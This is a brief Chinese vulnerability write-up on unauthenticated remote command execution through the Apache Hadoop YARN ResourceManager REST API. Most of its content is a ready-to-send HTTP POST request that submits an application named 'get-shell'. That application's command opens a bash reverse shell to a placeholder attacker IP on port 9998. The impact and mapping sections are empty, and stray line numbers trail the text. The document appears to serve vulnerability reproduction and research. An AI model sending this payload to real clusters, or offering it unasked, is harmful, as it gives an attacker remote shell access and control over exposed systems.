# Apache Hadoop Yarn RPC 远程命令执行漏洞
# 漏洞描述
Hadoop Yarn RPC未授权访问漏洞存在于Hadoop Yarn中负责资源管理和任务调度的ResourceManager,成因是该组件为用户提供的RPC服务默认情况下无需认证即可访问,
# 漏洞影响
# 网络测绘
# 漏洞复现
主页面
验证请求包
POST /ws/v1/cluster/apps HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json
{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8